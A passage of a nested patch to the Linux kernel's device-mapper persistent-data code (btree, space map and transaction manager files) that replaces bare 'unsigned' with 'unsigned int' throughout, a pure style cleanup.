+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned total = nr_left + nr_center + nr_right;
+-	unsigned target_right = total / 3;
+-	unsigned remainder = (target_right * 3) != total;
+-	unsigned target_left = target_right + remainder;
++	unsigned int total = nr_left + nr_center + nr_right;
++	unsigned int target_right = total / 3;
++	unsigned int remainder = (target_right * 3) != total;
++	unsigned int target_left = target_right + remainder;
+ 
+ 	BUG_ON(target_left > max_entries);
+ 	BUG_ON(target_right > max_entries);
+@@ -422,7 +422,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ 	uint32_t nr_center = le32_to_cpu(center->header.nr_entries);
+ 	uint32_t nr_right = le32_to_cpu(right->header.nr_entries);
+ 
+-	unsigned threshold = merge_threshold(left) * 4 + 1;
++	unsigned int threshold = merge_threshold(left) * 4 + 1;
+ 
+ 	if ((left->header.max_entries != center->header.max_entries) ||
+ 	    (center->header.max_entries != right->header.max_entries)) {
+@@ -440,7 +440,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance3(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_current(s));
+@@ -519,7 +519,7 @@ static int rebalance_children(struct shadow_spine *s,
+ 	return r;
+ }
+ 
+-static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
++static int do_leaf(struct btree_node *n, uint64_t key, unsigned int *index)
+ {
+ 	int i = lower_bound(n, key);
+ 
+@@ -539,7 +539,7 @@ static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
+  */
+ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ 		      struct dm_btree_value_type *vt, dm_block_t root,
+-		      uint64_t key, unsigned *index)
++		      uint64_t key, unsigned int *index)
+ {
+ 	int i = *index, r;
+ 	struct btree_node *n;
+@@ -589,7 +589,7 @@ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, dm_block_t *new_root)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -601,7 +601,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		r = remove_raw(&spine, info,
+ 			       (level == last_level ?
+ 				&info->value_type : &le64_vt),
+-			       root, keys[level], (unsigned *)&index);
++			       root, keys[level], (unsigned int *)&index);
+ 		if (r < 0)
+ 			break;
+ 
+@@ -685,9 +685,9 @@ static int remove_nearest(struct shadow_spine *s, struct dm_btree_info *info,
+ 
+ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 		      uint64_t *keys, uint64_t end_key,
+-		      dm_block_t *new_root, unsigned *nr_removed)
++		      dm_block_t *new_root, unsigned int *nr_removed)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -698,7 +698,7 @@ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 	init_shadow_spine(&spine, info);
+ 	for (level = 0; level < last_level; level++) {
+ 		r = remove_raw(&spine, info, &le64_vt,
+-			       root, keys[level], (unsigned *) &index);
++			       root, keys[level], (unsigned int *) &index);
+ 		if (r < 0)
+ 			goto out;
+ 
+@@ -742,7 +742,7 @@ out:
+ 
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *first_key, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed)
++			   dm_block_t *new_root, unsigned int *nr_removed)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/persistent-data/dm-btree-spine.c b/drivers/md/persistent-data/dm-btree-spine.c
+index e653458888a7c..45a39d4f1c10f 100644
+--- a/drivers/md/persistent-data/dm-btree-spine.c
++++ b/drivers/md/persistent-data/dm-btree-spine.c
+@@ -234,12 +234,12 @@ dm_block_t shadow_root(struct shadow_spine *s)
+ 	return s->root;
+ }
+ 
+-static void le64_inc(void *context, const void *value_le, unsigned count)
++static void le64_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_inc_range);
+ }
+ 
+-static void le64_dec(void *context, const void *value_le, unsigned count)
++static void le64_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_dec_range);
+ }
+diff --git a/drivers/md/persistent-data/dm-btree.c b/drivers/md/persistent-data/dm-btree.c
+index 5ce64e93aae74..1cc783d7030d8 100644
+--- a/drivers/md/persistent-data/dm-btree.c
++++ b/drivers/md/persistent-data/dm-btree.c
+@@ -23,8 +23,8 @@ static void memcpy_disk(void *dest, const void *src, size_t len)
+ 	__dm_unbless_for_disk(src);
+ }
+ 
+-static void array_insert(void *base, size_t elt_size, unsigned nr_elts,
+-			 unsigned index, void *elt)
++static void array_insert(void *base, size_t elt_size, unsigned int nr_elts,
++			 unsigned int index, void *elt)
+ 	__dm_written_to_disk(elt)
+ {
+ 	if (index < nr_elts)
+@@ -80,7 +80,7 @@ void inc_children(struct dm_transaction_manager *tm, struct btree_node *n,
+ 		vt->inc(vt->context, value_ptr(n, 0), nr_entries);
+ }
+ 
+-static int insert_at(size_t value_size, struct btree_node *node, unsigned index,
++static int insert_at(size_t value_size, struct btree_node *node, unsigned int index,
+ 		     uint64_t key, void *value)
+ 	__dm_written_to_disk(value)
+ {
+@@ -162,9 +162,9 @@ EXPORT_SYMBOL_GPL(dm_btree_empty);
+ struct frame {
+ 	struct dm_block *b;
+ 	struct btree_node *n;
+-	unsigned level;
+-	unsigned nr_children;
+-	unsigned current_child;
++	unsigned int level;
++	unsigned int nr_children;
++	unsigned int current_child;
+ };
+ 
+ struct del_stack {
+@@ -193,7 +193,7 @@ static int unprocessed_frames(struct del_stack *s)
+ 
+ static void prefetch_children(struct del_stack *s, struct frame *f)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block_manager *bm = dm_tm_get_bm(s->tm);
+ 
+ 	for (i = 0; i < f->nr_children; i++)
+@@ -205,7 +205,7 @@ static bool is_internal_level(struct dm_btree_info *info, struct frame *f)
+ 	return f->level < (info->levels - 1);
+ }
+ 
+-static int push_frame(struct del_stack *s, dm_block_t b, unsigned level)
++static int push_frame(struct del_stack *s, dm_block_t b, unsigned int level)
+ {
+ 	int r;
+ 	uint32_t ref_count;
+@@ -371,7 +371,7 @@ static int btree_lookup_raw(struct ro_spine *s, dm_block_t block, uint64_t key,
+ int dm_btree_lookup(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, void *value_le)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int r = -ENODATA;
+ 	uint64_t rkey;
+ 	__le64 internal_value_le;
+@@ -467,7 +467,7 @@ out:
+ int dm_btree_lookup_next(struct dm_btree_info *info, dm_block_t root,
+ 			 uint64_t *keys, uint64_t *rkey, void *value_le)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	int r = -ENODATA;
+ 	__le64 internal_value_le;
+ 	struct ro_spine spine;
+@@ -502,9 +502,9 @@ EXPORT_SYMBOL_GPL(dm_btree_lookup_next);
+  * Copies entries from one region of a btree node to another.  The regions
+  * must not overlap.
+  */
+-static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void copy_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memcpy(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -515,9 +515,9 @@ static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+  * Moves entries from one region fo a btree node to another.  The regions
+  * may overlap.
+  */
+-static void move_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void move_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memmove(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -528,7 +528,7 @@ static void move_entries(struct btree_node *dest, unsigned dest_offset,
+  * Erases the first 'count' entries of a btree node, shifting following
+  * entries down into their place.
+  */
+-static void shift_down(struct btree_node *n, unsigned count)
++static void shift_down(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, 0, n, count, le32_to_cpu(n->header.nr_entries) - count);
+ }
+@@ -537,7 +537,7 @@ static void shift_down(struct btree_node *n, unsigned count)
+  * Moves entries in a btree node up 'count' places, making space for
+  * new entries at the start of the node.
+  */
+-static void shift_up(struct btree_node *n, unsigned count)
++static void shift_up(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, count, n, 0, le32_to_cpu(n->header.nr_entries));
+ }
+@@ -548,18 +548,18 @@ static void shift_up(struct btree_node *n, unsigned count)
+  */
+ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total = nr_left + nr_right;
+-	unsigned target_left = total / 2;
+-	unsigned target_right = total - target_left;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total = nr_left + nr_right;
++	unsigned int target_left = total / 2;
++	unsigned int target_right = total - target_left;
+ 
+ 	if (nr_left < target_left) {
+-		unsigned delta = target_left - nr_left;
++		unsigned int delta = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, delta);
+ 		shift_down(right, delta);
+ 	} else if (nr_left > target_left) {
+-		unsigned delta = nr_left - target_left;
++		unsigned int delta = nr_left - target_left;
+ 		if (nr_right)
+ 			shift_up(right, delta);
+ 		copy_entries(right, 0, left, target_left, delta);
+@@ -576,10 +576,10 @@ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 			  struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_center = le32_to_cpu(center->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total, target_left, target_center, target_right;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_center = le32_to_cpu(center->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total, target_left, target_center, target_right;
+ 
+ 	BUG_ON(nr_center);
+ 
+@@ -589,19 +589,19 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 	target_right = (total - target_left - target_center);
+ 
+ 	if (nr_left < target_left) {
+-		unsigned left_short = target_left - nr_left;
++		unsigned int left_short = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, left_short);
+ 		copy_entries(center, 0, right, left_short, target_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else if (nr_left < (target_left + target_center)) {
+-		unsigned left_to_center = nr_left - target_left;
++		unsigned int left_to_center = nr_left - target_left;
+ 		copy_entries(center, 0, left, target_left, left_to_center);
+ 		copy_entries(center, left_to_center, right, 0, target_center - left_to_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else {
+-		unsigned right_short = target_right - nr_right;
++		unsigned int right_short = target_right - nr_right;
+ 		shift_up(right, right_short);
+ 		copy_entries(right, 0, left, nr_left - right_short, right_short);
+ 		copy_entries(center, 0, left, target_left, nr_left - target_left);
+@@ -642,7 +642,7 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+  *
+  * Where A* is a shadow of A.
+  */
+-static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
++static int split_one_into_two(struct shadow_spine *s, unsigned int parent_index,
+ 			      struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+@@ -696,7 +696,7 @@ static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
+  * to the new shadow.
+  */
+ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+-			struct btree_node *parent, unsigned index,
++			struct btree_node *parent, unsigned int index,
+ 			struct dm_block **result)
+ {
+ 	int r, inc;
+@@ -725,11 +725,11 @@ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *
+  * Splits two nodes into three.  This is more work, but results in fuller
+  * nodes, so saves metadata space.
+  */
+-static int split_two_into_three(struct shadow_spine *s, unsigned parent_index,
++static int split_two_into_three(struct shadow_spine *s, unsigned int parent_index,
+                                 struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+-	unsigned middle_index;
++	unsigned int middle_index;
+ 	struct dm_block *left, *middle, *right, *parent;
+ 	struct btree_node *ln, *rn, *mn, *pn;
+ 	__le64 location;
+@@ -830,7 +830,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+ {
+ 	int r;
+ 	size_t size;
+-	unsigned nr_left, nr_right;
++	unsigned int nr_left, nr_right;
+ 	struct dm_block *left, *right, *new_parent;
+ 	struct btree_node *pn, *ln, *rn;
+ 	__le64 val;
+@@ -904,7 +904,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+  * Redistributes a node's entries with its left sibling.
+  */
+ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			  unsigned parent_index, uint64_t key)
++			  unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -933,7 +933,7 @@ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt
+  * Redistributes a nodes entries with its right sibling.
+  */
+ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			   unsigned parent_index, uint64_t key)
++			   unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -961,10 +961,10 @@ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *v
+ /*
+  * Returns the number of spare entries in a node.
+  */
+-static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned *space)
++static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned int *space)
+ {
+ 	int r;
+-	unsigned nr_entries;
++	unsigned int nr_entries;
+ 	struct dm_block *block;
+ 	struct btree_node *node;
+ 
+@@ -990,12 +990,12 @@ static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigne
+  */
+ #define SPACE_THRESHOLD 8
+ static int rebalance_or_split(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			      unsigned parent_index, uint64_t key)
++			      unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_parent(s));
+-	unsigned nr_parent = le32_to_cpu(parent->header.nr_entries);
+-	unsigned free_space;
++	unsigned int nr_parent = le32_to_cpu(parent->header.nr_entries);
++	unsigned int free_space;
+ 	int left_shared = 0, right_shared = 0;
+ 
+ 	/* Should we move entries to the left sibling? */
+@@ -1080,7 +1080,7 @@ static bool has_space_for_insert(struct btree_node *node, uint64_t key)
+ 
+ static int btree_insert_raw(struct shadow_spine *s, dm_block_t root,
+ 			    struct dm_btree_value_type *vt,
+-			    uint64_t key, unsigned *index)
++			    uint64_t key, unsigned int *index)
+ {
+ 	int r, i = *index, top = 1;
+ 	struct btree_node *node;
+@@ -1214,7 +1214,7 @@ int btree_get_overwrite_leaf(struct dm_btree_info *info, dm_block_t root,
+ }
+ 
+ static bool need_insert(struct btree_node *node, uint64_t *keys,
+-			unsigned level, unsigned index)
++			unsigned int level, unsigned int index)
+ {
+         return ((index >= le32_to_cpu(node->header.nr_entries)) ||
+ 		(le64_to_cpu(node->keys[index]) != keys[level]));
+@@ -1226,7 +1226,7 @@ static int insert(struct dm_btree_info *info, dm_block_t root,
+ 		  __dm_written_to_disk(value)
+ {
+ 	int r;
+-	unsigned level, index = -1, last_level = info->levels - 1;
++	unsigned int level, index = -1, last_level = info->levels - 1;
+ 	dm_block_t block = root;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -1412,7 +1412,7 @@ static int walk_node(struct dm_btree_info *info, dm_block_t block,
+ 		     void *context)
+ {
+ 	int r;
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	struct dm_block *node;
+ 	struct btree_node *n;
+ 	uint64_t keys;
+@@ -1455,7 +1455,7 @@ EXPORT_SYMBOL_GPL(dm_btree_walk);
+ 
+ static void prefetch_values(struct dm_btree_cursor *c)
+ {
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	__le64 value_le;
+ 	struct cursor_node *n = c->nodes + c->depth - 1;
+ 	struct btree_node *bn = dm_block_data(n->b);
+diff --git a/drivers/md/persistent-data/dm-btree.h b/drivers/md/persistent-data/dm-btree.h
+index d2ae5aa4d00b6..5566e7c32e829 100644
+--- a/drivers/md/persistent-data/dm-btree.h
++++ b/drivers/md/persistent-data/dm-btree.h
+@@ -58,14 +58,14 @@ struct dm_btree_value_type {
+ 	 * somewhere.) This method is _not_ called for insertion of a new
+ 	 * value: It is assumed the ref count is already 1.
+ 	 */
+-	void (*inc)(void *context, const void *value, unsigned count);
++	void (*inc)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * These values are being deleted.  The btree takes care of freeing
+ 	 * the memory pointed to by @value.  Often the del function just
+ 	 * needs to decrement a reference counts somewhere.
+ 	 */
+-	void (*dec)(void *context, const void *value, unsigned count);
++	void (*dec)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * A test for equality between two values.  When a value is
+@@ -84,7 +84,7 @@ struct dm_btree_info {
+ 	/*
+ 	 * Number of nested btrees. (Not the depth of a single tree.)
+ 	 */
+-	unsigned levels;
++	unsigned int levels;
+ 	struct dm_btree_value_type value_type;
+ };
+ 
+@@ -149,7 +149,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+  */
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *keys, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed);
++			   dm_block_t *new_root, unsigned int *nr_removed);
+ 
+ /*
+  * Returns < 0 on failure.  Otherwise the number of key entries that have
+@@ -188,7 +188,7 @@ int dm_btree_walk(struct dm_btree_info *info, dm_block_t root,
+ 
+ struct cursor_node {
+ 	struct dm_block *b;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ struct dm_btree_cursor {
+@@ -196,7 +196,7 @@ struct dm_btree_cursor {
+ 	dm_block_t root;
+ 
+ 	bool prefetch_leaves;
+-	unsigned depth;
++	unsigned int depth;
+ 	struct cursor_node nodes[DM_BTREE_CURSOR_MAX_DEPTH];
+ };
+ 
+diff --git a/drivers/md/persistent-data/dm-persistent-data-internal.h b/drivers/md/persistent-data/dm-persistent-data-internal.h
+index c49e26fff36c8..b945a2be93fb2 100644
+--- a/drivers/md/persistent-data/dm-persistent-data-internal.h
++++ b/drivers/md/persistent-data/dm-persistent-data-internal.h
+@@ -9,11 +9,11 @@
+ 
+ #include "dm-block-manager.h"
+ 
+-static inline unsigned dm_hash_block(dm_block_t b, unsigned hash_mask)
++static inline unsigned int dm_hash_block(dm_block_t b, unsigned int hash_mask)
+ {
+-	const unsigned BIG_PRIME = 4294967291UL;
++	const unsigned int BIG_PRIME = 4294967291UL;
+ 
+-	return (((unsigned) b) * BIG_PRIME) & hash_mask;
++	return (((unsigned int) b) * BIG_PRIME) & hash_mask;
+ }
+ 
+ #endif	/* _PERSISTENT_DATA_INTERNAL_H */
+diff --git a/drivers/md/persistent-data/dm-space-map-common.c b/drivers/md/persistent-data/dm-space-map-common.c
+index bfbfa750e0160..af800efed9f3c 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.c
++++ b/drivers/md/persistent-data/dm-space-map-common.c
+@@ -126,7 +126,7 @@ static void *dm_bitmap_data(struct dm_block *b)
+ 
+ #define WORD_MASK_HIGH 0xAAAAAAAAAAAAAAAAULL
+ 
+-static unsigned dm_bitmap_word_used(void *addr, unsigned b)
++static unsigned int dm_bitmap_word_used(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -137,11 +137,11 @@ static unsigned dm_bitmap_word_used(void *addr, unsigned b)
+ 	return !(~bits & mask);
+ }
+ 
+-static unsigned sm_lookup_bitmap(void *addr, unsigned b)
++static unsigned int sm_lookup_bitmap(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+-	unsigned hi, lo;
++	unsigned int hi, lo;
+ 
+ 	b = (b & (ENTRIES_PER_WORD - 1)) << 1;
+ 	hi = !!test_bit_le(b, (void *) w_le);
+@@ -149,7 +149,7 @@ static unsigned sm_lookup_bitmap(void *addr, unsigned b)
+ 	return (hi << 1) | lo;
+ }
+ 
+-static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
++static void sm_set_bitmap(void *addr, unsigned int b, unsigned int val)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -167,8 +167,8 @@ static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
+ 		__clear_bit_le(b + 1, (void *) w_le);
+ }
+ 
+-static int sm_find_free(void *addr, unsigned begin, unsigned end,
+-			unsigned *result)
++static int sm_find_free(void *addr, unsigned int begin, unsigned int end,
++			unsigned int *result)
+ {
+ 	while (begin < end) {
+ 		if (!(begin & (ENTRIES_PER_WORD - 1)) &&
+@@ -237,7 +237,7 @@ int sm_ll_extend(struct ll_disk *ll, dm_block_t extra_blocks)
+ {
+ 	int r;
+ 	dm_block_t i, nr_blocks, nr_indexes;
+-	unsigned old_blocks, blocks;
++	unsigned int old_blocks, blocks;
+ 
+ 	nr_blocks = ll->nr_blocks + extra_blocks;
+ 	old_blocks = dm_sector_div_up(ll->nr_blocks, ll->entries_per_block);
+@@ -351,7 +351,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 
+ 	for (i = index_begin; i < index_end; i++, begin = 0) {
+ 		struct dm_block *blk;
+-		unsigned position;
++		unsigned int position;
+ 		uint32_t bit_end;
+ 
+ 		r = ll->load_ie(ll, i, &ie_disk);
+@@ -369,7 +369,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 		bit_end = (i == index_end - 1) ?  end : ll->entries_per_block;
+ 
+ 		r = sm_find_free(dm_bitmap_data(blk),
+-				 max_t(unsigned, begin, le32_to_cpu(ie_disk.none_free_before)),
++				 max_t(unsigned int, begin, le32_to_cpu(ie_disk.none_free_before)),
+ 				 bit_end, &position);
+ 		if (r == -ENOSPC) {
+ 			/*
+@@ -1097,7 +1097,7 @@ static inline int ie_cache_writeback(struct ll_disk *ll, struct ie_cache *iec)
+ 			       &iec->index, &iec->ie, &ll->bitmap_root);
+ }
+ 
+-static inline unsigned hash_index(dm_block_t index)
++static inline unsigned int hash_index(dm_block_t index)
+ {
+ 	return dm_hash_block(index, IE_CACHE_MASK);
+ }
+@@ -1106,7 +1106,7 @@ static int disk_ll_load_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	if (iec->valid) {
+@@ -1137,7 +1137,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	ll->bitmap_index_changed = true;
+@@ -1164,7 +1164,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 
+ static int disk_ll_init_index(struct ll_disk *ll)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
+ 		iec->valid = false;
+@@ -1186,7 +1186,7 @@ static dm_block_t disk_ll_max_entries(struct ll_disk *ll)
+ static int disk_ll_commit(struct ll_disk *ll)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
+diff --git a/drivers/md/persistent-data/dm-space-map-metadata.c b/drivers/md/persistent-data/dm-space-map-metadata.c
+index 392ae26134a4e..0d1fcdf29c835 100644
+--- a/drivers/md/persistent-data/dm-space-map-metadata.c
++++ b/drivers/md/persistent-data/dm-space-map-metadata.c
+@@ -94,8 +94,8 @@ struct block_op {
+ };
+ 
+ struct bop_ring_buffer {
+-	unsigned begin;
+-	unsigned end;
++	unsigned int begin;
++	unsigned int end;
+ 	struct block_op bops[MAX_RECURSIVE_ALLOCATIONS + 1];
+ };
+ 
+@@ -110,9 +110,9 @@ static bool brb_empty(struct bop_ring_buffer *brb)
+ 	return brb->begin == brb->end;
+ }
+ 
+-static unsigned brb_next(struct bop_ring_buffer *brb, unsigned old)
++static unsigned int brb_next(struct bop_ring_buffer *brb, unsigned int old)
+ {
+-	unsigned r = old + 1;
++	unsigned int r = old + 1;
+ 	return r >= ARRAY_SIZE(brb->bops) ? 0 : r;
+ }
+ 
+@@ -120,7 +120,7 @@ static int brb_push(struct bop_ring_buffer *brb,
+ 		    enum block_op_type type, dm_block_t b, dm_block_t e)
+ {
+ 	struct block_op *bop;
+-	unsigned next = brb_next(brb, brb->end);
++	unsigned int next = brb_next(brb, brb->end);
+ 
+ 	/*
+ 	 * We don't allow the last bop to be filled, this way we can
+@@ -171,8 +171,8 @@ struct sm_metadata {
+ 
+ 	dm_block_t begin;
+ 
+-	unsigned recursion_count;
+-	unsigned allocated_this_transaction;
++	unsigned int recursion_count;
++	unsigned int allocated_this_transaction;
+ 	struct bop_ring_buffer uncommitted;
+ 
+ 	struct threshold threshold;
+@@ -300,9 +300,9 @@ static int sm_metadata_get_count(struct dm_space_map *sm, dm_block_t b,
+ 				 uint32_t *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+-	unsigned adjustment = 0;
++	unsigned int adjustment = 0;
+ 
+ 	/*
+ 	 * We may have some uncommitted adjustments to add.  This list
+@@ -340,7 +340,7 @@ static int sm_metadata_count_is_more_than_one(struct dm_space_map *sm,
+ 					      dm_block_t b, int *result)
+ {
+ 	int r, adjustment = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+ 	uint32_t rc;
+ 
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.c b/drivers/md/persistent-data/dm-transaction-manager.c
+index 16643fc974e84..39885f8355847 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.c
++++ b/drivers/md/persistent-data/dm-transaction-manager.c
+@@ -28,14 +28,14 @@ struct prefetch_set {
+ 	dm_block_t blocks[PREFETCH_SIZE];
+ };
+ 
+-static unsigned prefetch_hash(dm_block_t b)
++static unsigned int prefetch_hash(dm_block_t b)
+ {
+ 	return hash_64(b, PREFETCH_BITS);
+ }
+ 
+ static void prefetch_wipe(struct prefetch_set *p)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < PREFETCH_SIZE; i++)
+ 		p->blocks[i] = PREFETCH_SENTINEL;
+ }
+@@ -48,7 +48,7 @@ static void prefetch_init(struct prefetch_set *p)
+ 
+ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ {
+-	unsigned h = prefetch_hash(b);
++	unsigned int h = prefetch_hash(b);
+ 
+ 	mutex_lock(&p->lock);
+ 	if (p->blocks[h] == PREFETCH_SENTINEL)
+@@ -59,7 +59,7 @@ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ 
+ static void prefetch_issue(struct prefetch_set *p, struct dm_block_manager *bm)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mutex_lock(&p->lock);
+ 
+@@ -103,7 +103,7 @@ struct dm_transaction_manager {
+ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+ 	int r = 0;
+-	unsigned bucket = dm_hash_block(b, DM_HASH_MASK);
++	unsigned int bucket = dm_hash_block(b, DM_HASH_MASK);
+ 	struct shadow_info *si;
+ 
+ 	spin_lock(&tm->lock);
+@@ -123,7 +123,7 @@ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+  */
+ static void insert_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+-	unsigned bucket;
++	unsigned int bucket;
+ 	struct shadow_info *si;
+ 
+ 	si = kmalloc(sizeof(*si), GFP_NOIO);
+@@ -393,11 +393,11 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+ EXPORT_SYMBOL_GPL(dm_tm_dec_range);
+ 
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn)
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn)
+ {
+ 	uint64_t b, begin, end;
